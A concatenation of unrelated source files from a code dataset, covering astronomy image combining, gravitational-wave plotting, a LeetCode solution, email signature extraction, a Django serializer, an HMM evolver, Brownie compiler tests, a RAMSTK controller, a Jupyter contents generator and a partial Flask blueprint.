array\n The combined image\n header : header object \n Header of the combined image\n outname : str\n Filename of the .fits output of the combined image\n \"\"\"\n hdu = fits.PrimaryHDU(data=np.abs(image), header=header)\n hdu.writeto(outname)\n\n\n\ndef freq_filling(im1, im2, hd1, hd2, hd3):\n \"\"\"\n Derive spectral index from image array, and make interpolation.\n\n Parameters\n ----------\n im1,im2 : float array\n The input images to be interpolated\n hd1, hd2 : header object\n Headers of the input images\n hd3 : header object\n Header for extracting the targeted frequency for interpolation\n \"\"\"\n interpol = im1\n interpol_header = hd1\n interpol_hdu = fits.PrimaryHDU(data=np.abs(im1), header=hd1)\n\n return interpol, interpol_header, interpol_hdu\n\n\n\n#################################################################\n\ndef AKB_interpol(lores1, lores2, hires,\n extnum1=0,\n extnum2=0,\n hiresextnum=0,\n scalefactor1=1.0, \n scalefactor2=1.0, \n output_fits=True,\n outfitsname='interpolate.fits'):\n \"\"\"\n This procedure is provided for the case that we need to interpolate\n two space observatory image, to make the image at the observing \n frequency of the ground based one.\n \n Parameter\n ---------\n lores1, lores2 : str\n Filaname of the input images, either variable name of HDUs, or\n can be the .fits format files. lores2 should be at the lower observing\n frequency.\n hires : str\n Filaname of the groundbased observing image. This is to supply header\n for obtaining the targeted frequency for interpolation.\n extnum1,2 : int\n The extension number to use from the low-res FITS file\n hiresextnum : int\n The extension number to use from the hi-res FITS file\n scalefactor1,2 : float\n scaling factors of the input images.\n fitsoutput : bool\n Option to set whether we have .fits output\n outfitsname : str\n The filename of .fits output.\n\n Return\n ---------\n lores : HDU object\n The interpolated image.\n \"\"\"\n\n # Read images\n hdu1, im1, hd1 = file_in(lores1, extnum1)\n hdu2, im2, hd2 = file_in(lores2, extnum2)\n hdu3, im3, hd3 = file_in(hires, hiresextnum)\n\n # Match flux unit\n im1, hd1 = flux_unit(im1, hd1)\n im2, hd2 = flux_unit(im2, hd2)\n\n # Smooth the high resolution image to the low resolution one\n # Here need to reead the header of the low resolution image, \n # to know what is the targeted resolution\n targres = 0.0\n im1 = smoothing(im1, targres)\n\n #* Image Registration (Match astrometry)\n # [Should be an optional step]\n # The initial offsets between images should not be too big. 
Otherwise \n # the correlation might be trapped to a local maximum.\n # Package exist, but not sure how to use it.\n\n # Derive Spectral index and Make interpolation\n interpol, interpol_header, interpol_hdu = freq_filling(im1, im2, hd1, hd2, hd3) \n\n # output .fits file\n if output_fits:\n outfits(interpol, interpol_header, outname=outfitsname)\n\n # return hdu\n return interpol_hdu\n\n#################################################################\n\ndef AKB_combine(hires, lores,\n highresextnum=0,\n lowresextnum=0,\n highresscalefactor=1.0,\n lowresscalefactor=1.0, \n lowresfwhm=1*u.arcmin,\n targres = -1.0,\n return_hdu=False,\n return_regridded_lores=False, output_fits=True):\n \"\"\"\n Fourier combine two data cubes\n\n Parameters\n ----------\n highresfitsfile : str\n The high-resolution FITS file\n lowresfitsfile : str\n The low-resolution (single-dish) FITS file\n highresextnum : int\n The extension number to use from the high-res FITS file\n highresscalefactor : float\n lowresscalefactor : float\n A factor to multiply the high- or low-resolution data by to match the\n low- or high-resolution data\n lowresfwhm : `astropy.units.Quantity`\n The full-width-half-max of the single-dish (low-resolution) beam;\n or the scale at which you want to try to match the low/high resolution\n data\n return_hdu : bool\n Return an HDU instead of just an image. It will contain two image\n planes, one for the real and one for the imaginary data.\n return_regridded_cube2 : bool\n Return the 2nd cube regridded into the pixel space of the first?\n \"\"\"\n\n #* Input data\n hdu1, im1, hd1 = file_in(hires, highresextnum)\n hdu2, im2raw, hd2 = file_in(lores, lowresextnum)\n\n # load default parameters (primary beam, the simultaneous FOV of the ground\n # based observations)\n # Ke Wang part. Need to think about which is the best way of doing this.\n # Here better to get the resolution information into the header (bmaj, bmin),\n # if it isn't there.\n\n #* Match flux unit (convert all possible units to un-ambiguous unit like Jy/pixel or Jy/arcsec^2)\n im1, hd1 = flux_unit(im1, hd1)\n im2raw, hd2 = flux_unit(im2raw, hd2)\n\n # Regrid the low resolution image to the same pixel scale and\n # field of view of the high resolution image\n hdu2, im2, nax1, nax2, pixscale = regrid(hd1, im1, im2raw, hd2)\n\n #* Image Registration (Match astrometry)\n # [Should be an optional step]\n # The initial offsets between images should not be too big. 
Otherwise \n # the correlation might be trapped to a local maximum.\n # Package exist, but not sure how to use it.\n\n # Fourier transform the images\n fft1 = np.fft.fft2(np.nan_to_num(im1*highresscalefactor))\n fft2 = np.fft.fft2(np.nan_to_num(im2*lowresscalefactor))\n\n #* Correct for the primary beam attenuation in fourier domain\n fft2 = pbcorr(fft2, hd1, hd2)\n\n #* flux matching [Use space observatory image to determine absolute flux]\n # [should be an optional step]\n fft1 = flux_match(fft1, fft2)\n\n # Constructing weight kernal (normalized to max=1)\n kernel2, kernel1 = feather_kernel(nax2, nax1, lowresfwhm, pixscale)\n\n #* Combine images in the fourier domain\n fftsum, combo = fftmerge(kernel1, kernel2, fft1, fft2)\n\n #* Final Smoothing\n # [should be an optional step]\n if (targres > 0.0):\n combo = smoothing(combo, targres)\n\n #* generate amplitude plot and PDF output\n akb_plot(fft1, fft2, fftsum)\n \n #* Generate the CASA 4.3 compatible header\n combo_header = casaheader(hdu1.header)\n\n # fits output\n if output_fits:\n outfits(combo, combo_header)\n\n # Return combined image array(s)\n if return_regridded_lores:\n return combo, hdu2\n else:\n return combo\n\n#################################################################\n\n\n\n# example\n# os.system(\"rm -rf output.fits\")\n# f = AKB_combine(\"faint_final.shift.fix.fits\",\"Dragon.im350.crop.fits\", lowresscalefactor=0.0015,return_hdu=True)\n\nos.system(\"rm -rf output.fits\")\nos.system(\"rm -rf interpolate.fits\")\ninterpol_hdu = AKB_interpol(\"Dragon.im350.crop.fits\", \"Dragon.im350.crop.fits\", \"faint_final.shift.fix.fits\")\nf = AKB_combine(\"faint_final.shift.fix.fits\",interpol_hdu, lowresscalefactor=0.0015,return_hdu=True)\n","sub_path":"uvcombine.py","file_name":"uvcombine.py","file_ext":"py","file_size_in_byte":15535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"195095449","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom sklearn.decomposition import PCA\n\ndef read_data(index):\n\n f = open('CBC Data/Gain0.001/signal' + str(index) + '.dat', 'r')\n\n lines = f.read().split('\\n')\n l = lines.__len__() - 1\n time = np.zeros(l)\n wave_data = np.zeros(l)\n noise_data = np.zeros(l)\n\n for i in range(0, l):\n time[i] = float(lines[i].split(' ')[0])\n wave_data[i] = float(lines[i].split(' ')[1])\n\n f.close()\n\n f = open('CBC Data/Gain0.001/noise' + str(index) + '.dat', 'r')\n lines = f.read().split('\\n')\n for i in range(0, l):\n noise_data[i] = float(lines[i].split(' ')[1])\n\n f.close()\n\n return time, wave_data, noise_data\n\n\n\ntime, wave_data, noise_data = read_data(np.random.randint(1,138))\n\n\nsampF = 1/(time[1]-time[0])\n\nplt.figure(1)\nplt.plot(time, wave_data- noise_data)\nplt.xlabel('Time (s)')\nplt.ylabel('Strain')\nplt.grid(True,'both')\nplt.draw()\n\nf, t, Sxx = signal.spectrogram(wave_data, sampF, 'hann', 100, 90)\n\nplt.figure(2)\nplt.pcolormesh(t, f, np.log10(Sxx))\nplt.ylabel('Frequency (Hz)')\nplt.xlabel('Time (sec)')\nplt.yscale('log')\nplt.ylim([10, 10**3])\nplt.draw()\n\nf, t, Sxx = signal.spectrogram(noise_data, sampF, 'hann', 100, 90)\n\nplt.figure(3)\nplt.pcolormesh(t, f, np.log10(Sxx))\nplt.ylabel('Frequency (Hz)')\nplt.xlabel('Time (sec)')\nplt.yscale('log')\nplt.ylim([10, 10**3])\nplt.draw()\n\nplt.figure(4)\nf, P1 = signal.welch(wave_data, fs=sampF, nperseg=4096/4)\nplt.loglog(f, P1)\nf, P2 = signal.welch(noise_data, fs=sampF, nperseg=4096/4)\nplt.loglog(f, P2)\n\n# 
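this x-limit is left commented out; restore it to zoom the PSD plot to the 10-1000 Hz band: 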
plt.xlim([10, 10**3])\nplt.xlabel('Frequency [Hz]')\nplt.ylabel('PSD [strain^2/Hz]')\nplt.grid(True,'both')\nplt.draw()\n\n# x_train = np.concatenate((P1, P2)).reshape(-1,1)\n#\n# pca = PCA(n_components=2).fit(x_train.T)\n#\n# plt.figure(5)\n#\n# for i in range(len(x_train)/2):\n# plt.plot(pca.transform(x_train)[i, 0], pca.transform(x_train)[i, 1], '.')\n#\n# for i in range(len(x_train) / 2,len(x_train)):\n# plt.plot(pca.transform(x_train)[i, 0], pca.transform(x_train)[i, 1], 'o')\n#\n# plt.xlabel('Component 1')\n# plt.ylabel('Component 2')\n# plt.draw()\n\nplt.show()\n","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"417282650","text":"#\n# @lc app=leetcode id=461 lang=python\n#\n# [461] Hamming Distance\n#\n# https://leetcode.com/problems/hamming-distance/description/\n#\n# algorithms\n# Easy (70.76%)\n# Likes: 1437\n# Dislikes: 138\n# Total Accepted: 267.5K\n# Total Submissions: 377.9K\n# Testcase Example: '1\\n4'\n#\n# The Hamming distance between two integers is the number of positions at which\n# the corresponding bits are different.\n# \n# Given two integers x and y, calculate the Hamming distance.\n# \n# Note:\n# 0 ≤ x, y < 2^31.\n# \n# \n# Example:\n# \n# Input: x = 1, y = 4\n# \n# Output: 2\n# \n# Explanation:\n# 1 (0 0 0 1)\n# 4 (0 1 0 0)\n# ⁠ ↑ ↑\n# \n# The above arrows point to positions where the corresponding bits are\n# different.\n# \n# \n#\n\n# @lc code=start\nclass Solution(object):\n def hammingDistance(self, x, y):\n \"\"\"\n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n # return bin(x ^ y).count('1')\n \n n = x ^ y\n ans = 0\n # while n&0xffffffff != 0:\n # ans += 1\n # n = n & (n-1) \n\n while n:\n if n & 1 == 1:\n ans += 1\n n = n>>1\n return ans \n \n\n# @lc code=end\n\n","sub_path":"Python/461.hamming-distance.py","file_name":"461.hamming-distance.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"506350688","text":"# Sebastian Staszczyk\n\ntab = [1, 2, 3, 4, 5, 6, 7, 8]\n\nparity_check = lambda number: number % 2 == 0\n\nfilter_numbers = filter(parity_check, tab)\n\nfor el in filter_numbers:\n print(el)","sub_path":"04-Subroutines/After class/Zad 40 - Filtrowanie danych.py","file_name":"Zad 40 - Filtrowanie danych.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"67372335","text":"import num\nimport speech\nfrom num2words import num2words\ndef retop(text,a,b):\n\ttry:\n\t\treturn{\n\t\t\t\"into \":a*b,\n\t\t\t\"by \":a/b,\n\t\t\t\"plus \":a+b,\n\t\t\t\"minus \":a-b,\n\t\t\t\"multiplied by \":a*b,\n\t\t\t\"times \":a*b,\n\t\t\t\"divided by \":a/b\n\t\t}[text]\n\texcept:\n\t\tspeech.say(\"Sorry. 
but i ain't capable of doing the operation\")\ndef find(text):\n\ttext=num.text2int(text)\n\tfin=text.split()\n\ta=int(fin[0])\n\tb=int(fin[-1])\n\tc=''\n\tfor i in range(1,len(fin)-1):\n\t\tc+=str(fin[i])\n\t\tc+=\" \"\n\tst=str(text)+' = '+str(num2words(retop(c,a,b)))\n\tspeech.say(st)\nif __name__==\"__main__\":\n\tfind('5 multiplied by 2')","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"149548049","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /Users/adam/code/talon/talon/signature/extraction.py\n# Compiled at: 2015-07-20 12:14:52\nimport os, logging, regex as re\nfrom PyML import SparseDataSet\nfrom talon.constants import RE_DELIMITER\nfrom talon.signature.constants import SIGNATURE_MAX_LINES, TOO_LONG_SIGNATURE_LINE\nfrom talon.signature.learning.featurespace import features, build_pattern\nfrom talon.utils import get_delimiter\nfrom talon.signature.bruteforce import get_signature_candidate\nfrom talon.signature.learning.helpers import has_signature\nlog = logging.getLogger(__name__)\nEXTRACTOR = None\nRE_REVERSE_SIGNATURE = re.compile('\\n# signature should consists of blocks like this\\n(?:\\n # it could end with empty line\\n e*\\n # there could be text lines but no more than 2 in a row\\n (te*){,2}\\n # every block should end with signature line\\n s\\n)+\\n', re.I | re.X | re.M | re.S)\n\ndef is_signature_line(line, sender, classifier):\n \"\"\"Checks if the line belongs to signature. Returns True or False.\"\"\"\n data = SparseDataSet([build_pattern(line, features(sender))])\n return classifier.decisionFunc(data, 0) > 0\n\n\ndef extract(body, sender):\n \"\"\"Strips signature from the body of the message.\n\n Returns stripped body and signature as a tuple.\n If no signature is found the corresponding returned value is None.\n \"\"\"\n try:\n delimiter = get_delimiter(body)\n body = body.strip()\n if has_signature(body, sender):\n lines = body.splitlines()\n markers = _mark_lines(lines, sender)\n text, signature = _process_marked_lines(lines, markers)\n if signature:\n text = delimiter.join(text)\n if text.strip():\n return (text, delimiter.join(signature))\n except Exception as e:\n log.exception('ERROR when extracting signature with classifiers')\n\n return (\n body, None)\n\n\ndef _mark_lines(lines, sender):\n \"\"\"Mark message lines with markers to distinguish signature lines.\n\n Markers:\n\n * e - empty line\n * s - line identified as signature\n * t - other i.e. 
ordinary text line\n\n >>> mark_message_lines(['Some text', '', 'Bob'], 'Bob')\n 'tes'\n \"\"\"\n global EXTRACTOR\n candidate = get_signature_candidate(lines)\n markers = bytearray('t' * len(lines))\n for i, line in reversed(list(enumerate(candidate))):\n j = len(lines) - len(candidate) + i\n if not line.strip():\n markers[j] = 'e'\n elif is_signature_line(line, sender, EXTRACTOR):\n markers[j] = 's'\n\n return markers\n\n\ndef _process_marked_lines(lines, markers):\n \"\"\"Run regexes against message's marked lines to strip signature.\n\n >>> _process_marked_lines(['Some text', '', 'Bob'], 'tes')\n (['Some text', ''], ['Bob'])\n \"\"\"\n signature = RE_REVERSE_SIGNATURE.match(markers[::-1])\n if signature:\n return (lines[:-signature.end()], lines[-signature.end():])\n else:\n return (\n lines, None)","sub_path":"pycfiles/clawpack-5.6.1.tar/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"534447192","text":"from rest_framework import serializers\n\nfrom likes import services as likes_services\nfrom ..models import TopHeadline\n\n\nclass TopHeadlineSerializer(serializers.ModelSerializer):\n is_fan = serializers.SerializerMethodField()\n\n class Meta:\n model = TopHeadline\n fields = (\n 'id',\n 'title',\n 'author',\n 'description',\n 'url',\n 'urlToImage',\n 'publishedAt',\n 'is_fan',\n 'total_likes',\n )\n\n def get_is_fan(self, obj) -> bool:\n user = self.context.get('request').user\n return likes_services.is_fan(obj, user)\n","sub_path":"4term/PyDjangoWebsite/news/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"577614797","text":"import yaml \nfrom os.path import isfile\nfrom contextlib import contextmanager\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy.ext.declarative import declarative_base\n\nconfig_path = '/opt/application/config'\nconfig_file = '%s/database.yml' % config_path \n\nif isfile(config_file):\n with open(config_file, 'r') as file:\n conn_info = yaml.load(file.read())\nelse:\n raise SystemExit(conn_info)\ndb_conf = conn_info[0]\nengine = create_engine('%s://%s:%s@%s/%s?charset=utf8' % (db_conf['engine'], db_conf['db_user'], db_conf['db_pass'], db_conf['host'], db_conf['db_name']))\n\nBase = declarative_base() \nsession = scoped_session(sessionmaker())\nsession.configure(bind=engine)\n\n@contextmanager\ndef session_scope():\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"574411858","text":"\"\"\"\nHidden Markov Model Evolver\n\nUsage:\n hmm_evolve.py [-h] [--generations GENERATIONS] [--population POPULATION]\n [--mu MUTATION_RATE] [--bottleneck BOTTLENECK] [--processes PROCESSORS]\n [--output OUTPUT_FILE] [--objective OBJECTIVE] [--repetitions REPETITIONS]\n [--turns TURNS] [--noise NOISE] [--nmoran NMORAN]\n [--states NUM_STATES] [--algorithm ALGORITHM]\n\nOptions:\n -h --help Show help\n --generations GENERATIONS Generations to run the EA [default: 500]\n --population POPULATION Population size [default: 40]\n --mu MUTATION_RATE Mutation rate [default: 0.1]\n 
--bottleneck BOTTLENECK Number of individuals to keep from each generation [default: 10]\n --processes PROCESSES Number of processes to use [default: 1]\n --output OUTPUT_FILE File to write data to [default: hmm_params.csv]\n --objective OBJECTIVE Objective function [default: score]\n --repetitions REPETITIONS Repetitions in objective [default: 100]\n --turns TURNS Turns in each match [default: 200]\n --noise NOISE Match noise [default: 0.00]\n --nmoran NMORAN Moran Population Size, if Moran objective [default: 4]\n --states NUM_STATES Number of FSM states [default: 5]\n --algorithm ALGORITHM Which algorithm to use (EA for evolutionary algorithm or PS for\n particle swarm algorithm) [default: EA]\n\"\"\"\n\nfrom docopt import docopt\n\nfrom axelrod_dojo import HMMParams, Population, prepare_objective\nfrom axelrod_dojo.algorithms.particle_swarm_optimization import PSO\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='HMM Evolver 0.3')\n print(arguments)\n processes = int(arguments['--processes'])\n\n # Vars for the genetic algorithm\n population = int(arguments['--population'])\n mutation_probability = float(arguments['--mu'])\n generations = int(arguments['--generations'])\n bottleneck = int(arguments['--bottleneck'])\n output_filename = arguments['--output']\n\n # Objective\n name = str(arguments['--objective'])\n repetitions = int(arguments['--repetitions'])\n turns = int(arguments['--turns'])\n noise = float(arguments['--noise'])\n nmoran = int(arguments['--nmoran'])\n\n # HMM\n num_states = int(arguments['--states'])\n params_kwargs = {\"num_states\": num_states}\n\n if arguments['--algorithm'] == \"PS\":\n objective = prepare_objective(name, turns, noise, repetitions, nmoran)\n pso = PSO(HMMParams, params_kwargs, objective=objective,\n population=population, generations=generations,\n size=num_states)\n\n xopt_helper, fopt = pso.swarm()\n xopt = HMMParams(num_states=num_states)\n xopt.read_vector(xopt_helper, num_states)\n else:\n objective = prepare_objective(name, turns, noise, repetitions, nmoran)\n population = Population(HMMParams, params_kwargs, population, objective,\n output_filename, bottleneck, mutation_probability,\n processes=processes)\n population.run(generations)\n \n # Get the best member of the population to output.\n scores = population.score_all()\n record, record_holder = 0, -1\n for i, s in enumerate(scores):\n if s >= record:\n record = s\n record_holder = i\n xopt, fopt = population.population[record_holder], record\n \n print(\"Best Score: {} {}\".format(fopt, xopt))\n","sub_path":"bin/hmm_evolve.py","file_name":"hmm_evolve.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"91417619","text":"#!/usr/bin/python3\n\nimport pytest\nimport solcx\n\n\nfrom brownie import config\nfrom brownie.project import build, compiler, sources\nfrom brownie.exceptions import CompilerError, ContractExists\n\nsources = sources.Sources()\n\n\n@pytest.fixture(scope=\"function\")\ndef version():\n yield\n config['solc']['version'] = \"v0.5.7\"\n compiler.set_solc_version()\n\n\ndef _solc_5_source():\n source = sources['BrownieTester']\n source = source.replace('BrownieTester', 'TempTester')\n source = source.replace('UnlinkedLib', 'TestLib')\n return source\n\n\ndef _solc_4_source():\n source = _solc_5_source()\n source = source.replace('payable ', '')\n source = source.replace('^0.5.0', '^0.4.25')\n return source\n\n\ndef test_build_keys():\n build_json = 
compiler.compile_contracts([\"contracts/BrownieTester.sol\"])\n assert set(build.BUILD_KEYS) == set(build_json['BrownieTester'])\n\n\ndef test_contract_exists():\n with pytest.raises(ContractExists):\n compiler.compile_source(sources['BrownieTester'])\n compiler.compile_contracts([\"contracts/BrownieTester.sol\"])\n\n\ndef test_set_solc_version(version):\n config['solc']['version'] = \"v0.5.0\"\n compiler.set_solc_version()\n assert config['solc']['version'] == solcx.get_solc_version_string().strip('\\n')\n\n\ndef test_unlinked_libraries(version):\n source = _solc_5_source()\n build_json = compiler.compile_source(source)\n assert '__TestLib__' in build_json['TempTester']['bytecode']\n config['solc']['version'] = \"v0.4.25\"\n compiler.set_solc_version()\n source = _solc_4_source()\n build_json = compiler.compile_source(source)\n assert '__TestLib__' in build_json['TempTester']['bytecode']\n\n\ndef test_compiler_errors(version):\n with pytest.raises(CompilerError):\n compiler.compile_contracts([\"contracts/Token.sol\"])\n compiler.compile_contracts([\"contracts/Token.sol\", \"contracts/SafeMath.sol\"])\n source = _solc_4_source()\n with pytest.raises(CompilerError):\n compiler.compile_source(source)\n config['solc']['version'] = \"v0.4.25\"\n compiler.set_solc_version()\n compiler.compile_source(source)\n","sub_path":"tests/project/compiler_test.py","file_name":"compiler_test.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"571162438","text":"# -*- coding: utf-8 -*-\n#\n# ramstk.modules.RAMSTKDataController.py is part of the RAMSTK Project\n#\n# All rights reserved.\n# Copyright 2007 - 2017 Doyle Rowland doyle.rowland reliaqual com\n\"\"\"Datamodels Package RAMSTKDataController.\"\"\"\n\nfrom pubsub import pub # pylint: disable=E0401\n\n__author__ = 'Doyle Rowland'\n__email__ = 'doyle.rowland@reliaqual.com'\n__organization__ = 'ReliaQual Associates, LLC'\n__copyright__ = 'Copyright 2017 Doyle \"weibullguy\" Rowland'\n\n\nclass RAMSTKDataController(object):\n \"\"\"\n Provide an interface between data models and RAMSTK views.\n\n This is the meta-class for all RAMSTK data controllers.\n\n :ivar _configuration: the :class:`ramstk.Configuration.Configuration`\n instance associated with the current RAMSTK instance.\n :ivar _dtm_data_model: the RAMSTKDataModel associated with the\n RAMSTKDataController.\n :ivar bool _test: indicates whether or not Data Controller is being tested.\n used to suppress pypubsub sending messages when running\n tests.\n \"\"\"\n\n def __init__(self, configuration, **kwargs):\n \"\"\"\n Initialize a RAMSTKDataController instance.\n\n :param configuration: the Configuration instance associated with the\n current instance of the RAMSTK application.\n :type configuration: :class:`ramstk.Configuration.Configuration`\n :keyword model: the RAMSTKDataModel() to associate.\n :ramstk_module: the all lowercase name of the RAMSTK Module the Data\n Controller is for.\n \"\"\"\n # Initialize private dictionary attributes.\n\n # Initialize private list attributes.\n\n # Initialize private scalar attributes.\n self._configuration = configuration\n self._dtm_data_model = kwargs['model']\n self._test = kwargs['test']\n\n self._module = None\n for __, char in enumerate(kwargs['ramstk_module']):\n if char.isalpha():\n self._module = kwargs['ramstk_module'].capitalize()\n\n # Initialize public dictionary attributes.\n\n # Initialize public list attributes.\n\n # Initialize public scalar 
attributes.\n\n def do_handle_results(self, error_code, error_msg, pub_msg=None):\n \"\"\"\n Handle the error code and error message from other methods.\n\n This methods processes the error code and error message from the\n insert, delete, update, and calculate methods.\n\n :param int error_code: the error code returned by the Data Model when\n requested to insert.\n :param str error_msg: the error message returned by the Data Model when\n requested to insert.\n :param str pub_msg: the message to be published by pypubsub.\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n # If the insert, delete, update, or calculation was successful log the\n # error message to the user log. Otherwise, log it to the debug log.\n if error_code == 0:\n self._configuration.RAMSTK_USER_LOG.info(error_msg)\n\n if pub_msg is not None and not self._test:\n pub.sendMessage(pub_msg)\n else:\n self._configuration.RAMSTK_DEBUG_LOG.error(error_msg)\n _return = True\n\n return _return\n\n def request_do_select(self, node_id, **kwargs):\n \"\"\"\n Request the RAMSTK Program database record associated with Node ID.\n\n :param int node_id: the Node ID to retrieve from the Tree.\n :return: the RAMSTK Program database record requested.\n \"\"\"\n return self._dtm_data_model.do_select(node_id, **kwargs)\n\n def request_do_select_all(self, **kwargs):\n \"\"\"\n Retrieve the treelib Tree() from the Data Model.\n\n :return: tree; the treelib Tree() of RAMSTKRequirement models in the\n Requirement tree.\n :rtype: dict\n \"\"\"\n return self._dtm_data_model.do_select_all(**kwargs)\n\n def request_get_attributes(self, node_id):\n \"\"\"\n Request attributes from the record associated with the Node ID.\n\n :param int node_id: the ID of the record in the RAMSTK Program\n database whose attributes are being\n requested.\n :return: _attributes\n :rtype: dict\n \"\"\"\n _entity = self.request_do_select(node_id)\n\n return _entity.get_attributes()\n\n def request_set_attributes(self, node_id, attributes):\n \"\"\"\n Set the attributes of the record associated with the Node ID.\n\n :param int node_id: the ID of the record in the RAMSTK Program database\n table whose attributes are to be set.\n :param dict attributes: the dictionary of attributes and values.\n :return: (_error_code, _msg); the error code and associated message.\n :rtype: (int, str)\n \"\"\"\n _entity = self.request_do_select(node_id)\n\n return _entity.set_attributes(attributes)\n\n def request_last_id(self, **kwargs): # pylint: disable=unused-argument\n \"\"\"\n Request the last entity ID used in the RAMSTK Program database.\n\n :return: the last entity ID used.\n :rtype: int\n \"\"\"\n return self._dtm_data_model.last_id\n","sub_path":"src/ramstk/modules/RAMSTKDataController.py","file_name":"RAMSTKDataController.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"332021939","text":"\"\"\"\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport json\nimport re\nimport time\n\n\ndef in_ipynb():\n \"\"\"\n Return True if this code is running in a Jupyter Notebook environment.\n \"\"\"\n try:\n return (str(type(get_ipython()))\n == \"\")\n except NameError:\n return False\n\nif in_ipynb():\n # In Jupyter Notebook, `logging` module's `basicConfig()` only works\n # after reloading.\n from importlib import reload\n reload(logging)\n\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',\n 
datefmt='%d %b %H:%M:%S', level=logging.DEBUG)\n\n\ndef main():\n cline_args = parse_args() # Command LINE ARGumentS\n notebook = read_input(cline_args.filename)\n notebook_w_contents, contents_ls = gen_contents(notebook)\n write_output(cline_args.out_fname, notebook_w_contents, contents_ls)\n\n\ndef parse_args():\n \"\"\"\n Parse command line arguments to get input and output filenames.\n\n Called by:\n main\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Add Table of Contents to Jupyter Notebook.\")\n\n parser.add_argument(\"filename\", type=str, help=\"Notebook directory\")\n parser.add_argument(\"-o\", \"--out_fname\", type=str, help=\"output filename\",\n default=\"toc_added_{}.ipynb\".format(\n time.ctime()).replace(\":\", \"-\"))\n\n return parser.parse_args()\n\n\ndef read_input(filename):\n \"\"\"\n Return:\n notebook (dict):\n JSON\n \"\"\"\n with open(filename) as f:\n notebook = json.load(f)\n return notebook\n\n\ndef gen_contents(notebook):\n \"\"\"\n Add contents cell\n add \"back to contents\" to notebook inplace\n \"\"\"\n contents_ls = [\"### Contents\\n\"]\n\n for cell_dict in notebook[\"cells\"]:\n source_ls = cell_dict[\"source\"]\n\n if (cell_dict[\"cell_type\"] == \"markdown\"\n and (source_ls[0].startswith(\"### \")\n or source_ls[0].startswith(\"#### \"))):\n add_entry(source_ls, contents_ls)\n\n if not source_ls[-1].endswith(\"\\n\"):\n source_ls[-1] += \"\\n\"\n source_ls.append(\"
    [Back to contents](#Contents)
    \")\n\n spaced_contents_ls = add_para_break(contents_ls)\n\n notebook[\"cells\"].insert(\n 1,\n {\"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": spaced_contents_ls,\n },\n )\n\n return notebook, spaced_contents_ls\n\n\ndef add_entry(md_ls, contents_ls):\n \"\"\"\n \"\"\"\n for heading_md in md_ls:\n heading_match = re.search(r\"^####? ([\\w ]+)\\n?$\", heading_md)\n if heading_match:\n heading_words = heading_match.group(1)\n\n if heading_md.startswith(\"### \"):\n prefix = \"* \"\n elif heading_md.startswith(\"#### \"):\n prefix = \" * \"\n\n bracket = \"[\" + heading_words + \"]\"\n paren = \"(#\" + \"-\".join(heading_words.split(\" \")) + \")\"\n suffix = \"\\n\"\n\n entry = prefix + bracket + paren + suffix\n contents_ls.append(entry)\n\n\ndef add_para_break(contents_ls):\n \"\"\"\n Return\n \"\"\"\n spaced_contents_ls = []\n for line in contents_ls:\n spaced_contents_ls.append(line)\n\n if (line.startswith(\"* \")\n and not spaced_contents_ls[-2].startswith(\"### Contents\")):\n for i in range(2):\n spaced_contents_ls.insert(-1, \"\\n\")\n\n return spaced_contents_ls\n\n\ndef write_output(out_fname, notebook, contents_ls):\n \"\"\"\n Write the formatted lines to output file.\n\n Called by:\n main\n \"\"\"\n with open(out_fname, \"w\") as f:\n json.dump(notebook, f)\n\n with open(out_fname + \".mdcontents.txt\", \"w\") as f:\n f.writelines(contents_ls)\n\n # logging.info(\"Output directory: {}\".format(os.getcwd()))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"=Utils/ipynb_contents/ipynb_contentsCopy.py","file_name":"ipynb_contentsCopy.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"340068485","text":"from flask import (\n Blueprint,\n request,\n # jsonify,\n session)\nfrom flask.views import MethodView\n\nfrom lib.global_func import (\n get_db,\n save_data_to_db,\n get_logger\n)\n\nfrom lib.models import (\n Project,\n project_name_length,\n project_description_length,\n)\n\n\napp = Blueprint(name='project', 